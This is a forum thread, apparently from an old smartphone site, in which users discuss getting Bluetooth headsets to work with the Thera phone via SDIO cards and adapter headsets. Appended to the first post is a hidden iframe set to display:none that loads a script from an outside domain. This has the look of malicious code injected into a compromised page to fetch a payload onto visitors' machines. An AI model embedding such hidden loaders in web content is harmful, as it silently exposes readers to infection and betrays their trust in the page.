+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

Can I use a Bluetooth headset with a Thera?

The Thera has an SD/IO slot which should work with an SD Bluetooth card. We are waiting for someone to confirm that it is possible to use a headset with a Bluetooth card. There is no built-in Bluetooth capability of the Thera. Check the replies for the latest information on this FAQ...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

SDIO Bluetooth Card May Not Support Headset Profile

Mike, while the SDIO slot in the Thera will accept the SD Bluetooth cards, I'm not aware of any of them supporting the Headset profile which is needed to get a Bluetooth headset to work with it. I know the Toshiba SDIO card does not support it. Toshiba's TAEC division just announced a new SDIO Bluetooth card that uses half the power of the original and is smaller. I've made some direct contact with them and asked if they are including the Headset profile. Still no word back from them. I'll post any news I get.

Mark

Jabra FreeSpeak Works with Thera, But w/Limits

I am using the Jabra FreeSpeak Headset with the Thera and it works fine with some limitations. You do have to use the adapter version of the FreeSpeak which has an adapter that plugs into the headset jack. Also the Send/End button does not work yet. Even with the activation guide Jabra posted on their website, it does not work with the Thera. I have contacted Jabra and they are looking into it and should get back to me soon. As a wireless headset, it is really nice, even with the limitations. I'm hoping for a SDIO Bluetooth card with the Headset Profile intergrated with the phone software to replace the adapter soon.

Mark

Editor and Site Administrator Convergent's Avatar

Thanks for the info...

Thanks a lot for the info... please give us the results of you inquiry. If you have other Thera tips or FAQs... feel free to add them here!
    Mike - Been Converged?

Thera Bluetooth Wireless headset

I just bought a Thera and a bluetooth SD card for it for the soul purpose of using a wireless headset. It sounds like that it is not supported currently. Has anyone heard anything different?

I have not read of anyone using the BT SD card successfully with a BT headset yet. There is big demand for this, so I suspect we will not have to wait much longer.

Rob.
    www.mobilerob.com
    Productivity software for Smartphones

I am using the Just Wireless bluetooth headset with the adapter. With the wireless head set you have to get use to some changes of how you use your phone. I have to put my phone on virbrate, because with the adapter pluged in you can not hear the phone ring with the head set in standby mode. Then When an incoming call comes I have to hit the send button on my phone then turn on the head set. The calls usually hang up their self.
    But if you talk on the phone as much as I do it is very well worth it. I have a case that holds my extra battery pack and adapter that clips to my belt. With the battery pack I can recharge the phone about 2 times in a day, and not having the wires atached to the head set is a big help.